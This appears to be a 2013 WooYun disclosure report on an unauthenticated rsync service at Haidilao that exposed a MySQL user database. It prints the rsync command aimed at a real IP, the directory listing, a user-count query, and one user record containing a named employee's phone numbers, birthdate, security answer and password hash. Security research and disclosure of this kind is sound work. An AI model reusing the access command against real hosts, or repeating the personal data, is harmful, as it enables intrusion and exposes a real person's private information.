当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2013-041636
漏洞标题:
系统配置不当敏感信息泄漏
相关厂商:
haidilao.com
漏洞作者:
盈盈无绪
提交时间:
2013-11-01 19:01
修复时间:
2013-12-16 19:02
公开时间:
2013-12-16 19:02
漏洞类型:
系统/服务运维配置不当
危害等级:
自评Rank:
10
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2013-11-01: 细节已通知厂商并且等待厂商处理中
2013-11-03: 厂商已经确认,细节仅向厂商公开
2013-11-13: 细节向核心白帽子及相关领域专家公开
2013-11-23: 细节向普通白帽子公开
2013-12-03: 细节向实习白帽子公开
2013-12-16: 细节向公众公开

简要描述:

系统配置不当,敏感信息泄漏

详细说明:

rsync  114.247.120.160::data/
drwx------        4096 2013/10/30 11:04:31 .
-rwx------           4 2013/10/25 23:55:26 cm_seed.data
drwx------        4096 2012/11/30 04:53:05 00
drwx------        4096 2012/11/30 05:40:27 batch
drwx------        4096 2012/11/30 05:40:27 cleanup
drwx------        4096 2012/11/30 05:40:28 lost+found
drwx------        4096 2013/07/19 18:45:29 mysql
drwx------        4096 2012/11/30 05:55:58 netfolder
drwx------        4096 2012/11/30 05:55:58 search
drwx------        4096 2012/11/30 06:20:31 ud


同步mysql内容回来看一下有邮件相关信息。

select count(*) from cm_user_info;
+----------+
| count(*) |
+----------+
|     2451 |
+----------+
1 row in set (0.00 sec)
2千多用户信息
| 1           | a      | liuy    | 1_liuy####_01_100000lx | {enc2}db77b4b806c0a76476ca824af7221bf5 | 我最爱的是谁       | 我最爱的是谢英        | NULL      | 刘扬-工程管理部-安全组-巡检员              | 18601124408   | NULL       | NULL    | NULL     | NULL | NULL     | NULL        | NULL      | NULL      | 0      | 1974-09-04 | NULL       | 18910071182   | NULL    | NULL    | f_11u5yl5iaml@liuy@hai | NULL   |


漏洞证明:

hdl.png


数据库应该是2012年底被弃用了,但是用户信息依然有效。

修复方案:

你们懂得

版权声明:转载请注明来源 盈盈无绪@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-11-03 09:09

厂商回复:

该漏洞已经通知相关技术人员进行修复,感谢您的提报

最新状态:

暂无